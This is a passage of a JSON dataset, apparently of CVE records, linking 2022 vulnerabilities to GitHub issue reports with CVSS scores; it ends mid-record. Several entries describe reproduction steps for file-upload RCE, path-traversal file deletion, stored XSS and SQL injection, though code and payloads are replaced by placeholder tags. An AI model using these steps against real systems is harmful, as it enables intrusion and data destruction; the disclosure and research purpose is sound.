  79576. "CVE_ID": "CVE-2022-24434",
  79577. "Issue_Url_old": "https://github.com/mscdex/busboy/issues/250",
  79578. "Issue_Url_new": "https://github.com/mscdex/busboy/issues/250",
  79579. "Repo_new": "mscdex/busboy",
  79580. "Issue_Created_At": "2021-08-05T18:27:04Z",
  79581. "description": "Security alert: Busboy can crash on manipulated multipart/form data header names. I already wrote a PR for this problem. which is actually a problem of Dicer which busboy uses. For more information see mscdex/dicer NUMBERTAG",
  79582. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  79583. "severity": "HIGH",
  79584. "baseScore": 7.5,
  79585. "impactScore": 3.6,
  79586. "exploitabilityScore": 3.9
  79587. },
  79588. {
  79589. "CVE_ID": "CVE-2022-24553",
  79590. "Issue_Url_old": "https://github.com/zfaka-plus/zfaka/issues/260",
  79591. "Issue_Url_new": "https://github.com/zfaka-plus/zfaka/issues/260",
  79592. "Repo_new": "zfaka-plus/zfaka",
  79593. "Issue_Created_At": "2022-01-31T03:17:01Z",
  79594. "description": "Zfaka Backend APITAG version). in the background file upload, Zfaka only has one JS check in PATHTAG there is no filtering for the file extension, and there is only one front end JS verification, So disabling JS can directly implement the background rce FILETAG The controller of upload in the background is located in PATHTAG The upload path will not be returned after the file is uploaded, but we already know the upload path and the naming rules of the uploaded file FILETAG UPLOAD_ Path is defined as follows APITAG CUR_ Date is defined as follows APITAG file name APITAG Taking NUMBERTAG as an example, the output results are as follows FILETAG Take NUMBERTAG on May NUMBERTAG as an example The full file path is APITAG Construct form directly CODETAG At the same time, you need to add referers: URLTAG , and modify the Otherwise, \"please select product ID\" will be prompted Finally, the complete upload HTTP request is as follows ERRORTAG Direct upload succeeded Then run the last seconds with burpsuite intruder After all, the number of seconds can't be so accurate FILETAG FILETAG",
  79595. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  79596. "severity": "CRITICAL",
  79597. "baseScore": 9.8,
  79598. "impactScore": 5.9,
  79599. "exploitabilityScore": 3.9
  79600. },
  79601. {
  79602. "CVE_ID": "CVE-2022-24568",
  79603. "Issue_Url_old": "https://github.com/201206030/novel-plus/issues/80",
  79604. "Issue_Url_new": "https://github.com/201206030/novel-plus/issues/80",
  79605. "Repo_new": "201206030/novel-plus",
  79606. "Issue_Created_At": "2022-02-01T16:38:03Z",
  79607. "description": "novel plus NUMBERTAG can be attacked by SSRF. Exploit Step NUMBERTAG isit the following page APITAG Step NUMBERTAG type the information in the picture FILETAG Code Analysis URLTAG URLTAG That means attacker can request intranet resource (such as novel admin)",
  79608. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  79609. "severity": "CRITICAL",
  79610. "baseScore": 9.8,
  79611. "impactScore": 5.9,
  79612. "exploitabilityScore": 3.9
  79613. },
  79614. {
  79615. "CVE_ID": "CVE-2022-24575",
  79616. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2058",
  79617. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2058",
  79618. "Repo_new": "gpac/gpac",
  79619. "Issue_Created_At": "2022-01-21T08:54:48Z",
  79620. "description": "Use After Free. ERRORTAG",
  79621. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  79622. "severity": "HIGH",
  79623. "baseScore": 7.8,
  79624. "impactScore": 5.9,
  79625. "exploitabilityScore": 1.8
  79626. },
  79627. {
  79628. "CVE_ID": "CVE-2022-24576",
  79629. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2061",
  79630. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2061",
  79631. "Repo_new": "gpac/gpac",
  79632. "Issue_Created_At": "2022-01-21T08:56:18Z",
  79633. "description": "Heap based Buffer Overflow. ERRORTAG",
  79634. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  79635. "severity": "MEDIUM",
  79636. "baseScore": 5.5,
  79637. "impactScore": 3.6,
  79638. "exploitabilityScore": 1.8
  79639. },
  79640. {
  79641. "CVE_ID": "CVE-2022-24594",
  79642. "Issue_Url_old": "https://github.com/walinejs/waline/issues/785",
  79643. "Issue_Url_new": "https://github.com/walinejs/waline/issues/785",
  79644. "Repo_new": "walinejs/waline",
  79645. "Issue_Created_At": "2022-01-30T01:15:54Z",
  79646. "description": "APITAG waline fake any ip vulnerability. \u95ee\u9898\u63cf\u8ff0 | Describe the bug URLTAG \u95ee\u9898\u7f51\u7ad9 | Website URL FILETAG \u670d\u52a1\u90e8\u7f72\u5728\u54ea\u91cc\uff1f | Where your waline deploy? Vercel APITAG \u6570\u636e\u5b58\u50a8\u5728\u54ea\u91cc\uff1f| Where your comment data store? APITAG FILETAG",
  79647. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  79648. "severity": "MEDIUM",
  79649. "baseScore": 5.3,
  79650. "impactScore": 1.4,
  79651. "exploitabilityScore": 3.9
  79652. },
  79653. {
  79654. "CVE_ID": "CVE-2022-24599",
  79655. "Issue_Url_old": "https://github.com/mpruett/audiofile/issues/60",
  79656. "Issue_Url_new": "https://github.com/mpruett/audiofile/issues/60",
  79657. "Repo_new": "mpruett/audiofile",
  79658. "Issue_Created_At": "2022-02-02T13:25:06Z",
  79659. "description": "Memory leak bug in printfileinfo, in printinfo.c. There exists one Memory leak bug in printfileinfo, in printinfo.c, which allows an attacker to leak the address of heap or libc via a crafted file. To reproduce with the attached poc file: FILETAG Heap address leak: ./sfinfo . APITAG APITAG the output of Copyright): ERRORTAG Libc address leak: ./sfinfo . APITAG APITAG the output of Copyright): ERRORTAG This vulnerability can be triggered anywhere the printfileinfo function is called, for example, sfconvert. The poc.py will help you to calculate the address, which is test on Ubuntu NUMBERTAG python2. Usage of poc.py: CODETAG The audiofile project is built with: APITAG",
  79660. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
  79661. "severity": "MEDIUM",
  79662. "baseScore": 6.5,
  79663. "impactScore": 3.6,
  79664. "exploitabilityScore": 2.8
  79665. },
  79666. {
  79667. "CVE_ID": "CVE-2022-24612",
  79668. "Issue_Url_old": "https://github.com/EyesOfNetworkCommunity/eonweb/issues/114",
  79669. "Issue_Url_new": "https://github.com/eyesofnetworkcommunity/eonweb/issues/114",
  79670. "Repo_new": "eyesofnetworkcommunity/eonweb",
  79671. "Issue_Created_At": "2022-02-03T00:58:30Z",
  79672. "description": "APITAG Hello, Il y a un petit soucis dans le contr\u00f4le des fichiers upload\u00e9s via le file upload du module ITSM. La possibilit\u00e9 d'uploader du format XML devrait se suivre d'un contr\u00f4le du dit fichier, en l'\u00e9tat il est possible d'uploader (via un user authentifi\u00e9), un document XML contenant une XSS ou d'autres joyeuset\u00e9es malicieuses. FILETAG",
  79673. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  79674. "severity": "MEDIUM",
  79675. "baseScore": 5.4,
  79676. "impactScore": 2.7,
  79677. "exploitabilityScore": 2.3
  79678. },
  79679. {
  79680. "CVE_ID": "CVE-2022-24613",
  79681. "Issue_Url_old": "https://github.com/drewnoakes/metadata-extractor/issues/561",
  79682. "Issue_Url_new": "https://github.com/drewnoakes/metadata-extractor/issues/561",
  79683. "Repo_new": "drewnoakes/metadata-extractor",
  79684. "Issue_Created_At": "2021-12-10T19:26:48Z",
  79685. "description": "A list of bugs found NUMBERTAG bugs in total NUMBERTAG Unique Bugs Found Recently we ( Zhang Cen URLTAG and Huang Wenjie URLTAG discovered a series of bugs in latest metadta extractor NUMBERTAG Every bug we reported in the following is unique and reproducable. We sorted and refined them from thousands of crashes. Furthermore, they have been manually analyzed and triaged in removing the duplicates. APITAG Due to the lack of contextual knowledge in the metadta extractor library, we cannot thoroughly fix some bugs hence we look forward to any proposed plan from the developers in fixing these bugs NUMBERTAG Bug Report and Crash Seeds The bug report folder can be downloaded from URLTAG It contains both reports and crash seeds NUMBERTAG Test Program to Reproduce Crashes The test program can be downloaded from URLTAG Total NUMBERTAG bugs are reported in this pull request. A full list is provided below NUMBERTAG Folder Structure Level NUMBERTAG folder): exception type Level NUMBERTAG folder): error location Level NUMBERTAG files): POC file and FILETAG including reproducing steps NUMBERTAG FILETAG content NUMBERTAG Exception type NUMBERTAG Error location NUMBERTAG Bug cause and impact NUMBERTAG Crash thread's stacks NUMBERTAG Steps to reproduce NUMBERTAG Bug Full List etadata extractor_reported_crashes \u251c\u2500\u2500 ERRORTAG \u2502\u00a0\u00a0 \u2514\u2500\u2500 APITAG APITAG NUMBERTAG ERRORTAG \u2502\u00a0\u00a0 \u251c\u2500\u2500 APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG ERRORTAG \u2502\u00a0\u00a0 \u251c\u2500\u2500 APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG ERRORTAG \u2502\u00a0\u00a0 \u251c\u2500\u2500 APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG ERRORTAG \u2502\u00a0\u00a0 \u251c\u2500\u2500 APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG ERRORTAG \u2502\u00a0\u00a0 \u251c\u2500\u2500 ERRORTAG \u2502\u00a0\u00a0 \u251c\u2500\u2500 APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG ERRORTAG \u2502\u00a0\u00a0 \u251c\u2500\u2500 APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG ERRORTAG \u251c\u2500\u2500 APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG Any further discussion for these vulnerabilities including fix is welcomed and look forward to hearing from you. Feel free to contact me at EMAILTAG",
  79686. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  79687. "severity": "MEDIUM",
  79688. "baseScore": 5.5,
  79689. "impactScore": 3.6,
  79690. "exploitabilityScore": 1.8
  79691. },
  79692. {
  79693. "CVE_ID": "CVE-2022-24615",
  79694. "Issue_Url_old": "https://github.com/srikanth-lingala/zip4j/issues/418",
  79695. "Issue_Url_new": "https://github.com/srikanth-lingala/zip4j/issues/418",
  79696. "Repo_new": "srikanth-lingala/zip4j",
  79697. "Issue_Created_At": "2022-03-31T09:40:41Z",
  79698. "description": "Does CVETAG affect versions NUMBERTAG and NUMBERTAG According to the NVD description of CVETAG URLTAG , CVETAG affects up to NUMBERTAG excluded). Actually NUMBERTAG and NUMBERTAG are also affected by CVETAG . Don't the versions affected by nvd CVETAG need to be modified?",
  79699. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  79700. "severity": "MEDIUM",
  79701. "baseScore": 5.5,
  79702. "impactScore": 3.6,
  79703. "exploitabilityScore": 1.8
  79704. },
  79705. {
  79706. "CVE_ID": "CVE-2022-24615",
  79707. "Issue_Url_old": "https://github.com/srikanth-lingala/zip4j/issues/377",
  79708. "Issue_Url_new": "https://github.com/srikanth-lingala/zip4j/issues/377",
  79709. "Repo_new": "srikanth-lingala/zip4j",
  79710. "Issue_Created_At": "2021-10-24T15:43:05Z",
  79711. "description": "Collection of Recent Reported Bugs for zip4j NUMBERTAG Recently we ( Zhang Cen URLTAG and Huang Wenjie URLTAG found and submitted several bugs of latest zip4j NUMBERTAG For your convenience, here lists the bug summary for all reported bugs (will keep it updated). Note that each issue is a unique bug (we sorted and refined them from thousands of crashes) Any discussion about the bugs are welcome. URLTAG URLTAG URLTAG URLTAG URLTAG URLTAG URLTAG URLTAG URLTAG URLTAG URLTAG",
  79712. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  79713. "severity": "MEDIUM",
  79714. "baseScore": 5.5,
  79715. "impactScore": 3.6,
  79716. "exploitabilityScore": 1.8
  79717. },
  79718. {
  79719. "CVE_ID": "CVE-2022-24620",
  79720. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/1605",
  79721. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/1605",
  79722. "Repo_new": "piwigo/piwigo",
  79723. "Issue_Created_At": "2022-02-02T19:14:54Z",
  79724. "description": "Piwigo NUMBERTAG ulnerable For Stored XSS Which Is Leading To Privilege Escalation. Hi, I found Stored XSS in Piwigo version NUMBERTAG APITAG tested older versions). Proof Of Concept NUMBERTAG Add an admin through webmaster's access NUMBERTAG Through the admin account open URLTAG NUMBERTAG Add APITAG APITAG space) in the group name field. Can use any malicious JS code, Now you can see XSS will pop up. Impact: In this way admin can easily takeover webmaster's access using FILETAG . Burp: ERRORTAG FILETAG Please fix the vulnerability & let me know :). Thank You! Chirag Artani URLTAG",
  79725. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  79726. "severity": "MEDIUM",
  79727. "baseScore": 5.4,
  79728. "impactScore": 2.7,
  79729. "exploitabilityScore": 2.3
  79730. },
  79731. {
  79732. "CVE_ID": "CVE-2022-24646",
  79733. "Issue_Url_old": "https://github.com/kishan0725/Hospital-Management-System/issues/18",
  79734. "Issue_Url_new": "https://github.com/kishan0725/hospital-management-system/issues/18",
  79735. "Repo_new": "kishan0725/hospital-management-system",
  79736. "Issue_Created_At": "2022-02-05T12:14:10Z",
  79737. "description": "VULNERABLE: SQL Injection exists in Hospital Management System. An attacker can inject query in PATHTAG via the APITAG parameters.. FILETAG Intercept contact info and save contents into a text APITAG FILETAG Run APITAG APITAG FILETAG Area of concern in FILETAG FILETAG",
  79738. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  79739. "severity": "HIGH",
  79740. "baseScore": 7.5,
  79741. "impactScore": 3.6,
  79742. "exploitabilityScore": 3.9
  79743. },
  79744. {
  79745. "CVE_ID": "CVE-2022-24647",
  79746. "Issue_Url_old": "https://github.com/CuppaCMS/CuppaCMS/issues/23",
  79747. "Issue_Url_new": "https://github.com/cuppacms/cuppacms/issues/23",
  79748. "Repo_new": "cuppacms/cuppacms",
  79749. "Issue_Created_At": "2022-02-05T17:14:57Z",
  79750. "description": "Multiple Unauthorized Arbitrary File Deletion vulnerabilities. Vulnerability Name: Multiple Arbitrary File Deletion Date of Discovery NUMBERTAG Feb NUMBERTAG Product APITAG NUMBERTAG FILETAG Author: lyy Vulnerability Description: When unsanitized user input is supplied to a file deletion function, an arbitrary file deletion vulnerability arises. This occurs in PHP when the APITAG function is called and user input might affect portions of or the whole affected parameter, which represents the path of the file to remove, without sufficient sanitization. Exploiting the vulnerability allows an attacker to delete any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to delete). Furthermore, an attacker can leverage the capability of arbitrary file deletion to circumvent certain webserver security mechanisms such as deleting .htaccess file that would deactivate those security constraints. Proof of Concept NUMBERTAG ulnerable URL: FILETAG Vulnerable Code: line NUMBERTAG PATHTAG FILETAG Steps to Reproduce: APITAG the request directly through burp CODETAG Proof of Concept NUMBERTAG ulnerable URL: FILETAG Vulnerable Code: line NUMBERTAG PATHTAG FILETAG APITAG can traverse the directory to delete any file Steps to Reproduce: APITAG the request directly through burp CODETAG FILETAG APITAG can traverse directories and delete APITAG all files in the directory while deleting the directory, so as to achieve the effect of deleting any file",
  79751. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
  79752. "severity": "HIGH",
  79753. "baseScore": 8.1,
  79754. "impactScore": 5.2,
  79755. "exploitabilityScore": 2.8
  79756. },
  79757. {
  79758. "CVE_ID": "CVE-2022-24676",
  79759. "Issue_Url_old": "https://github.com/hyyyp/HYBBS2/issues/33",
  79760. "Issue_Url_new": "https://github.com/hyyyp/hybbs2/issues/33",
  79761. "Repo_new": "hyyyp/hybbs2",
  79762. "Issue_Created_At": "2022-02-07T10:08:23Z",
  79763. "description": "There is an arbitrary file upload vulnerability in the HYBBS upload plugin function. There is an arbitrary file upload vulnerability in the HYBBS upload plugin function Vulnerability overview There is an arbitrary file upload vulnerability in the upload plugin function of the HYBBS management background, which can lead to server permissions. Vulnerability scope All versions prior to HYBBS NUMBERTAG ulnerability environment construction Clone the latest code factory library of HYBBS to the local, and then use phpstudy to build HYBBS. Vulnerability reproduction steps Make a malicious zip archive as shown below FILETAG Upload malicious zip archives in the management background upload plugin function FILETAG After uploading, it prompts that the upload was successful FILETAG It can be seen from the log of the folder monitoring software that HYBBS renamed the malicious compressed package and extracted it to the Plugin directory FILETAG FILETAG Vulnerability code analysis Locate the code of the plugin upload function FILETAG FILETAG HYBBS directly decompresses the compressed package and does not check the content of the compressed package, resulting in an arbitrary file upload vulnerability.",
  79764. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  79765. "severity": "HIGH",
  79766. "baseScore": 8.8,
  79767. "impactScore": 5.9,
  79768. "exploitabilityScore": 2.8
  79769. },
  79770. {
  79771. "CVE_ID": "CVE-2022-24677",
  79772. "Issue_Url_old": "https://github.com/hyyyp/HYBBS2/issues/34",
  79773. "Issue_Url_new": "https://github.com/hyyyp/hybbs2/issues/34",
  79774. "Repo_new": "hyyyp/hybbs2",
  79775. "Issue_Created_At": "2022-02-07T10:09:48Z",
  79776. "description": "There is an arbitrary file writing vulnerability in the HYBBS production plug in function. There is an arbitrary file writing vulnerability in the HYBBS production plug in function Vulnerability overview There is an arbitrary file writing vulnerability in the HYBBS management background making plugin function, which leads to the server permission being obtained. Vulnerability scope All versions prior to HYBBS NUMBERTAG ulnerability environment construction Clone the latest code factory library of HYBBS to the local, and then use phpstudy to build HYBBS. Vulnerability reproduction steps Fill in APITAG in the plugin description, and click the OK button. FILETAG Then it will prompt that the plugin was created successfully FILETAG From the folder monitoring software log, you can see that the program created the malicious file FILETAG FILETAG FILETAG Vulnerability code analysis Locate the code that makes the plug in function FILETAG It can be seen that the program directly writes the plugin related configuration information to FILETAG without any security filtering, resulting in an arbitrary file writing vulnerability.",
  79777. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  79778. "severity": "CRITICAL",
  79779. "baseScore": 9.8,
  79780. "impactScore": 5.9,
  79781. "exploitabilityScore": 3.9
  79782. },
  79783. {
  79784. "CVE_ID": "CVE-2022-24721",
  79785. "Issue_Url_old": "https://github.com/cometd/cometd/issues/1146",
  79786. "Issue_Url_new": "https://github.com/cometd/cometd/issues/1146",
  79787. "Repo_new": "cometd/cometd",
  79788. "Issue_Created_At": "2022-02-22T16:39:08Z",
  79789. "description": "Review APITAG channel usage. APITAG version(s NUMBERTAG Description Review usage of channels used by APITAG (e.g. Oort and Seti ).",
  79790. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
  79791. "severity": "HIGH",
  79792. "baseScore": 8.1,
  79793. "impactScore": 5.2,
  79794. "exploitabilityScore": 2.8
  79795. },
  79796. {
  79797. "CVE_ID": "CVE-2022-24725",
  79798. "Issue_Url_old": "https://github.com/ericcornelissen/shescape/issues/169",
  79799. "Issue_Url_new": "https://github.com/ericcornelissen/shescape/issues/169",
  79800. "Repo_new": "ericcornelissen/shescape",
  79801. "Issue_Created_At": "2022-02-19T18:00:52Z",
  79802. "description": "Trailing string APITAG in Bash not escaped properly by APITAG Bug Report Shescape version : APITAG =~ APITAG ~ ERRORTAG APITAG with interpolation escaping enabled the trailing ~ ERRORTAG APITAG with interpolation escaping enabled the trailing ~` should be escaped to avoid it being expanded when the argument is used. Working Example This bug was found by fuzzing, the crash result can be found here: FILETAG",
  79803. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  79804. "severity": "MEDIUM",
  79805. "baseScore": 5.5,
  79806. "impactScore": 3.6,
  79807. "exploitabilityScore": 1.8
  79808. },
  79809. {
  79810. "CVE_ID": "CVE-2022-24726",
  79811. "Issue_Url_old": "https://github.com/golang/go/issues/51112",
  79812. "Issue_Url_new": "https://github.com/golang/go/issues/51112",
  79813. "Repo_new": "golang/go",
  79814. "Issue_Created_At": "2022-02-09T20:13:46Z",
  79815. "description": "regexp: stack overflow (process exit) handling deeply nested regexp. On NUMBERTAG bit system, a large enough regexp can be deeply nested enough to cause goroutine stack overflows (the kind where the runtime says no more stack for you and exits). Specifically, APITAG APITAG NUMBERTAG is enough. I ran a test inside Google using C++ RE2 limiting the nesting depth of accepted expressions. A max depth of NUMBERTAG did not break any of our tests. (A max depth of NUMBERTAG did break one library that was mechanically generating a truly awful regular expression.) To fix the problem I intend to cap the maximum depth of a regexp accepted by APITAG at NUMBERTAG what is needed by Google C++ and really about NUMBERTAG what is reasonable. Depth means the depth of the parse tree: APITAG has depth NUMBERTAG as does APITAG in POSIX mode. (In Perl mode that's a syntax error.) This will need to be backported to Go NUMBERTAG and Go NUMBERTAG as well.",
  79816. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  79817. "severity": "HIGH",
  79818. "baseScore": 7.5,
  79819. "impactScore": 3.6,
  79820. "exploitabilityScore": 3.9
  79821. },
  79822. {
  79823. "CVE_ID": "CVE-2022-24739",
  79824. "Issue_Url_old": "https://github.com/ytdl-org/youtube-dl/issues/30691",
  79825. "Issue_Url_new": "https://github.com/ytdl-org/youtube-dl/issues/30691",
  79826. "Repo_new": "ytdl-org/youtube-dl",
  79827. "Issue_Created_At": "2022-02-27T11:53:30Z",
  79828. "description": "Add a way to not follow redirects. APITAG Checklist APITAG [x] I'm reporting a feature request [x] I've verified that I'm running youtube dl version APITAG [x] I've searched the bugtracker for similar feature requests including closed ones Description APITAG The generic extractor currently follows redirects blindly. This is not an issue when running youtube dl locally, however when it is used in a web app this can allow an attacker to run a SSRF attack. Even if the web app does not allow calling youtube dl on internal URLs, an attacker could still craft an external URL redirecting to an internal resource. Because of this, apps sending requests to arbitrary external URLs [should disable redirects in the HTTP client URLTAG but youtube dl provides no easy way to do this. I see two solutions to this: Add a way to disable the generic extractor Add a flag that would make this extractor not follow redirects",
  79829. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  79830. "severity": "MEDIUM",
  79831. "baseScore": 6.1,
  79832. "impactScore": 2.7,
  79833. "exploitabilityScore": 2.8
  79834. },
  79835. {
  79836. "CVE_ID": "CVE-2022-24762",
  79837. "Issue_Url_old": "https://github.com/jcubic/sysend.js/issues/33",
  79838. "Issue_Url_new": "https://github.com/jcubic/sysend.js/issues/33",
  79839. "Repo_new": "jcubic/sysend.js",
  79840. "Issue_Created_At": "2022-03-13T12:52:34Z",
  79841. "description": "Leaking of potential sensitive user information on Cross Domain communication. If users use cross domain communication, attackers can create an iframe and listen to any messages sent from the app and also send messages to the app. This happens only in the same browser so this is low impact. Example exploit, if you upload this file to any domain, you can intercept messages from FILETAG APITAG",
  79842. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
  79843. "severity": "MEDIUM",
  79844. "baseScore": 6.5,
  79845. "impactScore": 3.6,
  79846. "exploitabilityScore": 2.8
  79847. },
  79848. {
  79849. "CVE_ID": "CVE-2022-24778",
  79850. "Issue_Url_old": "https://github.com/containerd/imgcrypt/issues/69",
  79851. "Issue_Url_new": "https://github.com/containerd/imgcrypt/issues/69",
  79852. "Repo_new": "containerd/imgcrypt",
  79853. "Issue_Created_At": "2022-03-15T16:36:15Z",
  79854. "description": "APITAG not working for multi arch images. When a multi arch index descriptor is provided to the imgcrypt's APITAG func (e.g. via APITAG the library iterates over the manifests it refers to with the APITAG option set to true to perform a check only. That causes the cycle to stop on the first manifest in the collection as the condition here URLTAG will always be evaluated to true error regardless. Additionally, if reading any of the referred manifest's children returns an APITAG URLTAG , the cycle will exit with a nil error, thus, the authorization check passes incorrectly. Let's take for example the case where the cycle checks the first manifest in the collection (e.g. for amd NUMBERTAG on an arm/arm NUMBERTAG machine, the children of this manifest are not found since this is not the target platform and they are not pulled > the authorization check passes incorrectly. This issue is rarely reproducible on an amd NUMBERTAG machine as usually, this is the first manifest in the index descriptor.",
  79855. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  79856. "severity": "HIGH",
  79857. "baseScore": 7.5,
  79858. "impactScore": 3.6,
  79859. "exploitabilityScore": 3.9
  79860. },
  79861. {
  79862. "CVE_ID": "CVE-2022-24815",
  79863. "Issue_Url_old": "https://github.com/jhipster/generator-jhipster/issues/18269",
  79864. "Issue_Url_new": "https://github.com/jhipster/generator-jhipster/issues/18269",
  79865. "Repo_new": "jhipster/generator-jhipster",
  79866. "Issue_Created_At": "2022-04-03T23:08:46Z",
  79867. "description": "SQL Injection in Reactive project. I don't know whether this is the right place to ask this though... In a reactive spring project with r2dbc, I found that SQL injection is actually possible. This may happen because of me, lacking knowledge on how to use r2dbc correctly. If it is case please let me know the correct usage. Setup Jhipster NUMBERTAG reactive with Spring APITAG Yes type of database? SQL JDL APITAG Change I made Make /api/ be accessible without authorization header Make GET /api/examples accept query parameter of name , and bind the parameter to the APITAG repository method Make a request to APITAG Result The sql rendered was APITAG That actually dropped the table APITAG",
  79868. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  79869. "severity": "HIGH",
  79870. "baseScore": 8.1,
  79871. "impactScore": 5.9,
  79872. "exploitabilityScore": 2.2
  79873. },
  79874. {
  79875. "CVE_ID": "CVE-2022-24837",
  79876. "Issue_Url_old": "https://github.com/node-formidable/formidable/issues/808",
  79877. "Issue_Url_new": "https://github.com/node-formidable/formidable/issues/808",
  79878. "Repo_new": "node-formidable/formidable",
  79879. "Issue_Created_At": "2022-01-02T21:39:54Z",
  79880. "description": "uniq filenames. Whenever i encounter a \"need to generate a uniq filename\" and including dependencies and so forth like hexoid to generate them URLTAG and seeing stuff like: URLTAG Then i might sometimes link to this article: URLTAG APITAG URLTAG is suppose to help you with this... how about instead generate one uniq dir with mkdtemp and simple use the filename n NUMBERTAG instead (without extension)? APITAG my proposal: remove hexoid",
  79881. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  79882. "severity": "MEDIUM",
  79883. "baseScore": 5.3,
  79884. "impactScore": 1.4,
  79885. "exploitabilityScore": 3.9
  79886. },
  79887. {
  79888. "CVE_ID": "CVE-2022-24843",
  79889. "Issue_Url_old": "https://github.com/flipped-aurora/gin-vue-admin/issues/1002",
  79890. "Issue_Url_new": "https://github.com/flipped-aurora/gin-vue-admin/issues/1002",
  79891. "Repo_new": "flipped-aurora/gin-vue-admin",
  79892. "Issue_Created_At": "2022-04-02T07:25:03Z",
  79893. "description": "APITAG Security Issues NUMBERTAG luckyt0mat0. gin vue admin NUMBERTAG b Node NUMBERTAG Golang \u7248\u672c APITAG \u662f\u5426\u4f9d\u65e7\u5b58\u5728 \u53ef\u4ee5 bug\u63cf\u8ff0 \u53d1\u73b0\u4e86\u4e00\u4e2a\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6/\u4e0b\u8f7d\u5b89\u5168\u6f0f\u6d1e\uff0cwx\u8054\u7cfb~ \u4fee\u6539\u5efa\u8bae \u53c2\u6570\u6821\u9a8c\u4e0b\u5373\u53ef\u3002",
  79894. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  79895. "severity": "HIGH",
  79896. "baseScore": 7.5,
  79897. "impactScore": 3.6,
  79898. "exploitabilityScore": 3.9
  79899. },
  79900. {
  79901. "CVE_ID": "CVE-2022-24851",
  79902. "Issue_Url_old": "https://github.com/LDAPAccountManager/lam/issues/170",
  79903. "Issue_Url_new": "https://github.com/ldapaccountmanager/lam/issues/170",
  79904. "Repo_new": "ldapaccountmanager/lam",
  79905. "Issue_Created_At": "2022-04-10T18:07:59Z",
  79906. "description": "Multiple vulnerabilities in LDAP Account Manager. Hello.. I am a security researcher, and with my friend Manthan( APITAG We reviewed the application and discovered multiple vulnerabilities NUMBERTAG Stored XSS Description The profile editor tool has an edit profile functionality, the parameters on this page are not properly sanitized and hence leads to stored XSS attacks. An authenticated user can store XSS payloads in the profiles, which gets triggered when any other user try to access the edit profile page. Impact APITAG (depends on how the server profile is configured.. if ldap users and ldap admin both can login to ldap account manager, an ldap user can write save xss payloads to trigger tasks as admin) Affected URL FILETAG POC : As an authenticated user navigate to the URL FILETAG FILETAG Create a new user profile for either user or group (editing profile will also work) and in description field add the XSS payload APITAG and save the profile. FILETAG Now whenever any authenticated user will edit this profile page, XSS payload will be triggered. FILETAG FILETAG NUMBERTAG Arbitrary jpg/png file read Description The pdf editor tool has an edit pdf profile functionality, the APITAG parameter in it is not properly sanitized and an user can enter relative paths like APITAG via tools like burpsuite. Later when a pdf is exported using the edited profile the pdf icon has the image on that path(if image is present). Impact Low APITAG is low, due to highly unlikelihood of ldap admin knowing the locations of images having any APITAG information. One possible attack vector is to enumerate tools/software on the system by checking for icon images.. like in this POC we can verify the server has vim installed) Affected URL FILETAG POC : As an authenticated user 